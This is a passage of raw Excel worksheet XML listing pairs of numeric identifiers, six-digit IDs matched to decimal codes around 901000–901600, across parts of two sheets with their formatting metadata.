    </row>
    <row r="1576" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1576" s="6">
        <v>400361</v>
      </c>
      <c r="B1576" s="3">
        <v>901606.00199999998</v>
      </c>
    </row>
    <row r="1577" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1577" s="6">
        <v>400361</v>
      </c>
      <c r="B1577" s="3">
        <v>901550</v>
      </c>
    </row>
    <row r="1578" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1578" s="6">
        <v>400361</v>
      </c>
      <c r="B1578" s="3">
        <v>901550.00100000005</v>
      </c>
    </row>
    <row r="1579" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1579" s="6">
        <v>400361</v>
      </c>
      <c r="B1579" s="3">
        <v>901550.00399999996</v>
      </c>
    </row>
    <row r="1580" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1580" s="6">
        <v>400370</v>
      </c>
      <c r="B1580" s="3">
        <v>901003</v>
      </c>
    </row>
    <row r="1581" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1581" s="6">
        <v>400370</v>
      </c>
      <c r="B1581" s="3">
        <v>901003.00199999998</v>
      </c>
    </row>
    <row r="1582" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1582" s="6">
        <v>400370</v>
      </c>
      <c r="B1582" s="3">
        <v>901003.00399999996</v>
      </c>
    </row>
    <row r="1583" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1583" s="6">
        <v>400370</v>
      </c>
      <c r="B1583" s="3">
        <v>901012</v>
      </c>
    </row>
    <row r="1584" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1584" s="6">
        <v>400370</v>
      </c>
      <c r="B1584" s="3">
        <v>901614.00100000005</v>
      </c>
    </row>
    <row r="1585" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1585" s="6">
        <v>400370</v>
      </c>
      <c r="B1585" s="3">
        <v>901552</v>
      </c>
    </row>
    <row r="1586" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1586" s="6">
        <v>400370</v>
      </c>
      <c r="B1586" s="3">
        <v>901552.00199999998</v>
      </c>
    </row>
    <row r="1587" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1587" s="6">
        <v>400371</v>
      </c>
      <c r="B1587" s="3">
        <v>901547</v>
      </c>
    </row>
    <row r="1588" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1588" s="6">
        <v>400371</v>
      </c>
      <c r="B1588" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="1589" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1589" s="6">
        <v>400371</v>
      </c>
      <c r="B1589" s="3">
        <v>901547.01399999997</v>
      </c>
    </row>
    <row r="1590" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1590" s="6">
        <v>400371</v>
      </c>
      <c r="B1590" s="3">
        <v>901037</v>
      </c>
    </row>
    <row r="1591" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1591" s="6">
        <v>400371</v>
      </c>
      <c r="B1591" s="3">
        <v>901037.00100000005</v>
      </c>
    </row>
    <row r="1592" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1592" s="6">
        <v>400371</v>
      </c>
      <c r="B1592" s="3">
        <v>901176</v>
      </c>
    </row>
    <row r="1593" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1593" s="6">
        <v>400371</v>
      </c>
      <c r="B1593" s="3">
        <v>901543</v>
      </c>
    </row>
    <row r="1594" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1594" s="6">
        <v>400371</v>
      </c>
      <c r="B1594" s="3">
        <v>901543.00300000003</v>
      </c>
    </row>
    <row r="1595" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1595" s="6">
        <v>400371</v>
      </c>
      <c r="B1595" s="3">
        <v>901562.00199999998</v>
      </c>
    </row>
    <row r="1596" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1596" s="6">
        <v>400371</v>
      </c>
      <c r="B1596" s="3">
        <v>901562.00899999996</v>
      </c>
    </row>
    <row r="1597" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1597" s="6">
        <v>400371</v>
      </c>
      <c r="B1597" s="3">
        <v>901112</v>
      </c>
    </row>
    <row r="1598" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1598" s="6">
        <v>400371</v>
      </c>
      <c r="B1598" s="3">
        <v>901137</v>
      </c>
    </row>
    <row r="1599" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1599" s="6">
        <v>400371</v>
      </c>
      <c r="B1599" s="3">
        <v>901137.00100000005</v>
      </c>
    </row>
    <row r="1600" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1600" s="6">
        <v>400371</v>
      </c>
      <c r="B1600" s="3">
        <v>901137.00199999998</v>
      </c>
    </row>
    <row r="1601" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1601" s="6">
        <v>400371</v>
      </c>
      <c r="B1601" s="3">
        <v>901137.00600000005</v>
      </c>
    </row>
    <row r="1602" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1602" s="6">
        <v>400371</v>
      </c>
      <c r="B1602" s="3">
        <v>901553</v>
      </c>
    </row>
    <row r="1603" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1603" s="6">
        <v>400371</v>
      </c>
      <c r="B1603" s="3">
        <v>901553.00399999996</v>
      </c>
    </row>
    <row r="1604" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1604" s="6">
        <v>400372</v>
      </c>
      <c r="B1604" s="3">
        <v>901562</v>
      </c>
    </row>
    <row r="1605" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1605" s="6">
        <v>400372</v>
      </c>
      <c r="B1605" s="3">
        <v>901562.00100000005</v>
      </c>
    </row>
    <row r="1606" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1606" s="6">
        <v>400372</v>
      </c>
      <c r="B1606" s="3">
        <v>901070</v>
      </c>
    </row>
    <row r="1607" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1607" s="6">
        <v>400372</v>
      </c>
      <c r="B1607" s="3">
        <v>901112</v>
      </c>
    </row>
    <row r="1608" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1608" s="6">
        <v>400373</v>
      </c>
      <c r="B1608" s="3">
        <v>901548</v>
      </c>
    </row>
    <row r="1609" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1609" s="6">
        <v>400373</v>
      </c>
      <c r="B1609" s="3">
        <v>901548.00199999998</v>
      </c>
    </row>
    <row r="1610" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1610" s="6">
        <v>400373</v>
      </c>
      <c r="B1610" s="3">
        <v>901557</v>
      </c>
    </row>
    <row r="1611" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1611" s="6">
        <v>400373</v>
      </c>
      <c r="B1611" s="3">
        <v>901557.00100000005</v>
      </c>
    </row>
    <row r="1612" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1612" s="6">
        <v>400373</v>
      </c>
      <c r="B1612" s="3">
        <v>901547</v>
      </c>
    </row>
    <row r="1613" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1613" s="6">
        <v>400373</v>
      </c>
      <c r="B1613" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="1614" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1614" s="6">
        <v>400373</v>
      </c>
      <c r="B1614" s="3">
        <v>901547.00199999998</v>
      </c>
    </row>
    <row r="1615" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1615" s="6">
        <v>400373</v>
      </c>
      <c r="B1615" s="3">
        <v>901547.00300000003</v>
      </c>
    </row>
    <row r="1616" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1616" s="6">
        <v>400373</v>
      </c>
      <c r="B1616" s="3">
        <v>901547.00399999996</v>
      </c>
    </row>
    <row r="1617" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1617" s="6">
        <v>400373</v>
      </c>
      <c r="B1617" s="3">
        <v>901547.005</v>
      </c>
    </row>
    <row r="1618" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1618" s="6">
        <v>400373</v>
      </c>
      <c r="B1618" s="3">
        <v>901547.01</v>
      </c>
    </row>
    <row r="1619" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1619" s="6">
        <v>400373</v>
      </c>
      <c r="B1619" s="3">
        <v>901547.01199999999</v>
      </c>
    </row>
    <row r="1620" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1620" s="6">
        <v>400373</v>
      </c>
      <c r="B1620" s="3">
        <v>901547.01399999997</v>
      </c>
    </row>
    <row r="1621" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1621" s="6">
        <v>400373</v>
      </c>
      <c r="B1621" s="3">
        <v>901543</v>
      </c>
    </row>
    <row r="1622" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1622" s="6">
        <v>400373</v>
      </c>
      <c r="B1622" s="3">
        <v>901543.00300000003</v>
      </c>
    </row>
    <row r="1623" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1623" s="6">
        <v>400373</v>
      </c>
      <c r="B1623" s="3">
        <v>901546</v>
      </c>
    </row>
    <row r="1624" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1624" s="6">
        <v>400373</v>
      </c>
      <c r="B1624" s="3">
        <v>901546.00100000005</v>
      </c>
    </row>
    <row r="1625" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1625" s="6">
        <v>400373</v>
      </c>
      <c r="B1625" s="3">
        <v>901546.00199999998</v>
      </c>
    </row>
    <row r="1626" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1626" s="6">
        <v>400373</v>
      </c>
      <c r="B1626" s="3">
        <v>901546.00699999998</v>
      </c>
    </row>
    <row r="1627" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1627" s="6">
        <v>400373</v>
      </c>
      <c r="B1627" s="3">
        <v>901546.00800000003</v>
      </c>
    </row>
    <row r="1628" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1628" s="6">
        <v>400373</v>
      </c>
      <c r="B1628" s="3">
        <v>901546.00899999996</v>
      </c>
    </row>
    <row r="1629" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1629" s="6">
        <v>400373</v>
      </c>
      <c r="B1629" s="3">
        <v>901546.01</v>
      </c>
    </row>
    <row r="1630" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1630" s="6">
        <v>400373</v>
      </c>
      <c r="B1630" s="3">
        <v>901546.01100000006</v>
      </c>
    </row>
    <row r="1631" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1631" s="6">
        <v>400373</v>
      </c>
      <c r="B1631" s="3">
        <v>901546.01199999999</v>
      </c>
    </row>
    <row r="1632" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1632" s="6">
        <v>400373</v>
      </c>
      <c r="B1632" s="3">
        <v>901546.01500000001</v>
      </c>
    </row>
    <row r="1633" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1633" s="6">
        <v>400373</v>
      </c>
      <c r="B1633" s="3">
        <v>901564</v>
      </c>
    </row>
    <row r="1634" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1634" s="6">
        <v>400373</v>
      </c>
      <c r="B1634" s="3">
        <v>901564.00199999998</v>
      </c>
    </row>
    <row r="1635" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1635" s="6">
        <v>400373</v>
      </c>
      <c r="B1635" s="3">
        <v>901564.005</v>
      </c>
    </row>
    <row r="1636" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1636" s="6">
        <v>400373</v>
      </c>
      <c r="B1636" s="3">
        <v>901564.00600000005</v>
      </c>
    </row>
    <row r="1637" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1637" s="6">
        <v>400373</v>
      </c>
      <c r="B1637" s="3">
        <v>901574</v>
      </c>
    </row>
    <row r="1638" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1638" s="6">
        <v>400373</v>
      </c>
      <c r="B1638" s="3">
        <v>901574.01100000006</v>
      </c>
    </row>
    <row r="1639" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1639" s="6">
        <v>400373</v>
      </c>
      <c r="B1639" s="3">
        <v>901574.01199999999</v>
      </c>
    </row>
    <row r="1640" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1640" s="6">
        <v>400373</v>
      </c>
      <c r="B1640" s="3">
        <v>901562</v>
      </c>
    </row>
    <row r="1641" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1641" s="6">
        <v>400373</v>
      </c>
      <c r="B1641" s="3">
        <v>901562.00100000005</v>
      </c>
    </row>
    <row r="1642" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1642" s="6">
        <v>400373</v>
      </c>
      <c r="B1642" s="3">
        <v>901562.00399999996</v>
      </c>
    </row>
    <row r="1643" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1643" s="6">
        <v>400373</v>
      </c>
      <c r="B1643" s="3">
        <v>901562.00600000005</v>
      </c>
    </row>
    <row r="1644" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1644" s="6">
        <v>400373</v>
      </c>
      <c r="B1644" s="3">
        <v>901562.00899999996</v>
      </c>
    </row>
    <row r="1645" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1645" s="6">
        <v>400373</v>
      </c>
      <c r="B1645" s="3">
        <v>901070</v>
      </c>
    </row>
    <row r="1646" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1646" s="6">
        <v>400373</v>
      </c>
      <c r="B1646" s="3">
        <v>901490</v>
      </c>
    </row>
    <row r="1647" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1647" s="6">
        <v>400373</v>
      </c>
      <c r="B1647" s="3">
        <v>901056</v>
      </c>
    </row>
    <row r="1648" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1648" s="6">
        <v>400373</v>
      </c>
      <c r="B1648" s="3">
        <v>901056.00100000005</v>
      </c>
    </row>
    <row r="1649" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1649" s="6">
        <v>400373</v>
      </c>
      <c r="B1649" s="3">
        <v>901556</v>
      </c>
    </row>
    <row r="1650" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1650" s="6">
        <v>400373</v>
      </c>
      <c r="B1650" s="3">
        <v>901556.00199999998</v>
      </c>
    </row>
    <row r="1651" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1651" s="6">
        <v>400373</v>
      </c>
      <c r="B1651" s="3">
        <v>901112</v>
      </c>
    </row>
    <row r="1652" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1652" s="6">
        <v>400373</v>
      </c>
      <c r="B1652" s="3">
        <v>901137</v>
      </c>
    </row>
    <row r="1653" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1653" s="6">
        <v>400373</v>
      </c>
      <c r="B1653" s="3">
        <v>901137.00100000005</v>
      </c>
    </row>
    <row r="1654" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1654" s="6">
        <v>400373</v>
      </c>
      <c r="B1654" s="3">
        <v>901137.00199999998</v>
      </c>
    </row>
    <row r="1655" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1655" s="6">
        <v>400373</v>
      </c>
      <c r="B1655" s="3">
        <v>901137.00600000005</v>
      </c>
    </row>
    <row r="1656" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1656" s="6">
        <v>400373</v>
      </c>
      <c r="B1656" s="3">
        <v>901489</v>
      </c>
    </row>
    <row r="1657" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1657" s="6">
        <v>400373</v>
      </c>
      <c r="B1657" s="3">
        <v>901218</v>
      </c>
    </row>
    <row r="1658" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1658" s="6">
        <v>400373</v>
      </c>
      <c r="B1658" s="3">
        <v>901218.00199999998</v>
      </c>
    </row>
    <row r="1659" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1659" s="6">
        <v>400373</v>
      </c>
      <c r="B1659" s="3">
        <v>901553</v>
      </c>
    </row>
    <row r="1660" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1660" s="6">
        <v>400373</v>
      </c>
      <c r="B1660" s="3">
        <v>901553.00300000003</v>
      </c>
    </row>
    <row r="1661" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1661" s="6">
        <v>400373</v>
      </c>
      <c r="B1661" s="3">
        <v>901553.00399999996</v>
      </c>
    </row>
    <row r="1662" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1662" s="6">
        <v>400373</v>
      </c>
      <c r="B1662" s="3">
        <v>901553.00600000005</v>
      </c>
    </row>
    <row r="1663" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1663" s="6">
        <v>400373</v>
      </c>
      <c r="B1663" s="3">
        <v>901569</v>
      </c>
    </row>
    <row r="1664" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1664" s="6">
        <v>400373</v>
      </c>
      <c r="B1664" s="3">
        <v>901569.00199999998</v>
      </c>
    </row>
    <row r="1665" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1665" s="6">
        <v>400373</v>
      </c>
      <c r="B1665" s="3">
        <v>901111</v>
      </c>
    </row>
    <row r="1666" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1666" s="6">
        <v>400380</v>
      </c>
      <c r="B1666" s="3">
        <v>901546</v>
      </c>
    </row>
    <row r="1667" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1667" s="6">
        <v>400380</v>
      </c>
      <c r="B1667" s="3">
        <v>901546.00300000003</v>
      </c>
    </row>
  </sheetData>
  <phoneticPr fontId="1" type="noConversion"/>
  <conditionalFormatting sqref="E2:E1667">
    <cfRule type="duplicateValues" dxfId="1" priority="2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4DA9-79E5-47E2-8016-664A77A8C83B}">
  <dimension ref="A1:B844"/>
  <sheetViews>
    <sheetView topLeftCell="A830" workbookViewId="0">
      <selection activeCell="G836" sqref="G836"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="13.8" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="2" max="2" width="12.109375" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1" s="3" t="s">
        <v>10</v>
      </c>
      <c r="B1" s="3" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="2" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2" s="6">
        <v>800043</v>
      </c>
      <c r="B2" s="3">
        <v>901595</v>
      </c>
    </row>
    <row r="3" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A3" s="6">
        <v>800043</v>
      </c>
      <c r="B3" s="3">
        <v>901595.00100000005</v>
      </c>
    </row>
    <row r="4" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A4" s="6">
        <v>800043</v>
      </c>
      <c r="B4" s="3">
        <v>901595.00199999998</v>
      </c>
    </row>
    <row r="5" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A5" s="6">
        <v>800043</v>
      </c>
      <c r="B5" s="3">
        <v>901592</v>
      </c>
    </row>
    <row r="6" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A6" s="6">
        <v>800043</v>
      </c>
      <c r="B6" s="3">
        <v>901592.00100000005</v>
      </c>
    </row>
    <row r="7" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A7" s="6">
        <v>800043</v>
      </c>
      <c r="B7" s="3">
        <v>901592.00199999998</v>
      </c>
    </row>
    <row r="8" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A8" s="6">
        <v>800043</v>
      </c>
      <c r="B8" s="3">
        <v>901592.00300000003</v>
      </c>
    </row>
    <row r="9" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A9" s="6">
        <v>800043</v>
      </c>
      <c r="B9" s="3">
        <v>901592.00399999996</v>
      </c>
    </row>
    <row r="10" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A10" s="6">
        <v>800043</v>
      </c>
      <c r="B10" s="3">
        <v>901589</v>
      </c>
    </row>
    <row r="11" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A11" s="6">
        <v>800043</v>
      </c>
      <c r="B11" s="3">
        <v>901589.00100000005</v>
      </c>
    </row>
    <row r="12" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A12" s="6">
        <v>800043</v>
      </c>
      <c r="B12" s="3">
        <v>901589.00199999998</v>
      </c>
    </row>
    <row r="13" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A13" s="6">
        <v>800043</v>
      </c>
      <c r="B13" s="3">
        <v>901589.00300000003</v>
      </c>
    </row>
    <row r="14" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A14" s="6">
        <v>800043</v>
      </c>
      <c r="B14" s="3">
        <v>901590</v>
      </c>
    </row>
    <row r="15" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A15" s="6">
        <v>800043</v>
      </c>
      <c r="B15" s="3">
        <v>901590.00100000005</v>
      </c>
    </row>
    <row r="16" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A16" s="6">
        <v>800043</v>
      </c>
      <c r="B16" s="3">
        <v>901590.00199999998</v>
      </c>
    </row>
    <row r="17" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A17" s="6">
        <v>800043</v>
      </c>
      <c r="B17" s="3">
        <v>901590.00300000003</v>
      </c>
    </row>
    <row r="18" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A18" s="6">
        <v>800043</v>
      </c>
      <c r="B18" s="3">
        <v>901590.00399999996</v>
      </c>
    </row>
    <row r="19" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A19" s="6">
        <v>800043</v>
      </c>
      <c r="B19" s="3">
        <v>901590.005</v>
      </c>
    </row>
    <row r="20" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A20" s="6">
        <v>800043</v>
      </c>
      <c r="B20" s="3">
        <v>901590.00600000005</v>
      </c>
    </row>
    <row r="21" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A21" s="6">
        <v>800043</v>
      </c>
      <c r="B21" s="3">
        <v>901591</v>
      </c>
    </row>
    <row r="22" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A22" s="6">
        <v>800043</v>
      </c>
      <c r="B22" s="3">
        <v>901591.00100000005</v>
      </c>
    </row>
    <row r="23" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A23" s="6">
        <v>800043</v>
      </c>
      <c r="B23" s="3">
        <v>901591.00199999998</v>
      </c>
    </row>
    <row r="24" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A24" s="6">
        <v>800043</v>
      </c>
      <c r="B24" s="3">
        <v>901591.00300000003</v>
      </c>
    </row>
    <row r="25" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A25" s="6">
        <v>800043</v>
      </c>
      <c r="B25" s="3">
        <v>901591.00399999996</v>
      </c>
    </row>
    <row r="26" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A26" s="6">
        <v>800043</v>
      </c>
      <c r="B26" s="3">
        <v>901598</v>
      </c>
    </row>
    <row r="27" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A27" s="6">
        <v>800043</v>
      </c>
      <c r="B27" s="3">
        <v>901598.00100000005</v>
      </c>
    </row>
    <row r="28" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A28" s="6">
        <v>800043</v>
      </c>
      <c r="B28" s="3">
        <v>901598.00199999998</v>
      </c>
    </row>
    <row r="29" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A29" s="6">
        <v>800043</v>
      </c>
      <c r="B29" s="3">
        <v>901598.00300000003</v>
      </c>
    </row>
    <row r="30" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A30" s="6">
        <v>800043</v>
      </c>
      <c r="B30" s="3">
        <v>901597</v>
      </c>
    </row>
    <row r="31" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A31" s="6">
        <v>800043</v>
      </c>
      <c r="B31" s="3">
        <v>901597.00100000005</v>
      </c>
    </row>
    <row r="32" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A32" s="6">
        <v>800043</v>
      </c>
      <c r="B32" s="3">
        <v>901597.00199999998</v>
      </c>
    </row>
    <row r="33" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A33" s="6">
        <v>800043</v>
      </c>
      <c r="B33" s="3">
        <v>901596</v>
      </c>
    </row>
    <row r="34" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A34" s="6">
        <v>800043</v>
      </c>
      <c r="B34" s="3">
        <v>901596.00100000005</v>
      </c>
    </row>
    <row r="35" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A35" s="6">
        <v>800043</v>
      </c>
      <c r="B35" s="3">
        <v>901596.00199999998</v>
      </c>
    </row>
    <row r="36" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A36" s="6">
        <v>800043</v>
      </c>
      <c r="B36" s="3">
        <v>901596.00300000003</v>
      </c>
    </row>
    <row r="37" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A37" s="6">
        <v>800043</v>
      </c>
      <c r="B37" s="3">
        <v>901596.00399999996</v>
      </c>
    </row>
    <row r="38" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A38" s="6">
        <v>800043</v>
      </c>
      <c r="B38" s="3">
        <v>901596.005</v>
      </c>
    </row>
    <row r="39" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A39" s="6">
        <v>800043</v>
      </c>
      <c r="B39" s="3">
        <v>901593</v>
      </c>
    </row>
    <row r="40" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A40" s="6">
        <v>800043</v>
      </c>
      <c r="B40" s="3">
        <v>901593.00100000005</v>
      </c>
    </row>
    <row r="41" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A41" s="6">
        <v>800043</v>
      </c>
      <c r="B41" s="3">
        <v>901593.00199999998</v>
      </c>
    </row>
    <row r="42" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A42" s="6">
        <v>800043</v>
      </c>
      <c r="B42" s="3">
        <v>901594</v>
      </c>
    </row>
    <row r="43" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A43" s="6">
        <v>800042</v>
      </c>
      <c r="B43" s="3">
        <v>901583</v>
      </c>
    </row>
    <row r="44" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A44" s="6">
        <v>800042</v>
      </c>
      <c r="B44" s="3">
        <v>901583.00100000005</v>
      </c>
    </row>
    <row r="45" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A45" s="6">
        <v>800042</v>
      </c>
      <c r="B45" s="3">
        <v>901583.00199999998</v>
      </c>
    </row>
    <row r="46" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A46" s="6">
        <v>800042</v>
      </c>
      <c r="B46" s="3">
        <v>901583.00300000003</v>
      </c>
    </row>
    <row r="47" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A47" s="6">
        <v>800042</v>
      </c>
      <c r="B47" s="3">
        <v>901583.00399999996</v>
      </c>
    </row>
    <row r="48" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A48" s="6">
        <v>800042</v>
      </c>
      <c r="B48" s="3">
        <v>901583.005</v>
      </c>
    </row>
    <row r="49" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A49" s="6">
        <v>800042</v>
      </c>
      <c r="B49" s="3">
        <v>901583.00600000005</v>
      </c>
    </row>
    <row r="50" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A50" s="6">
        <v>800042</v>
      </c>
      <c r="B50" s="3">
        <v>901586</v>
      </c>
    </row>
    <row r="51" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A51" s="6">
        <v>800042</v>
      </c>
      <c r="B51" s="3">
        <v>901586.00100000005</v>
      </c>
    </row>
    <row r="52" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A52" s="6">
        <v>800042</v>
      </c>
      <c r="B52" s="3">
        <v>901586.00199999998</v>
      </c>
    </row>
    <row r="53" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A53" s="6">
        <v>800042</v>
      </c>
      <c r="B53" s="3">
        <v>901584</v>
      </c>
    </row>
    <row r="54" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A54" s="6">
        <v>800042</v>
      </c>
      <c r="B54" s="3">
        <v>901584.00100000005</v>
      </c>
    </row>
    <row r="55" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A55" s="6">
        <v>800042</v>
      </c>
      <c r="B55" s="3">
        <v>901584.00199999998</v>
      </c>
    </row>
    <row r="56" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A56" s="6">
        <v>800042</v>
      </c>
      <c r="B56" s="3">
        <v>901584.00300000003</v>
      </c>
    </row>
    <row r="57" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A57" s="6">
        <v>800042</v>
      </c>
      <c r="B57" s="3">
        <v>901584.00399999996</v>
      </c>
    </row>
    <row r="58" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A58" s="6">
        <v>800042</v>
      </c>
      <c r="B58" s="3">
        <v>901584.005</v>
      </c>
    </row>
    <row r="59" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A59" s="6">
        <v>800042</v>
      </c>
      <c r="B59" s="3">
        <v>901584.00600000005</v>
      </c>
    </row>
    <row r="60" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A60" s="6">
        <v>800042</v>
      </c>
      <c r="B60" s="3">
        <v>901587</v>
      </c>
    </row>
    <row r="61" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A61" s="6">
        <v>800042</v>
      </c>
      <c r="B61" s="3">
        <v>901587.00100000005</v>
      </c>
    </row>
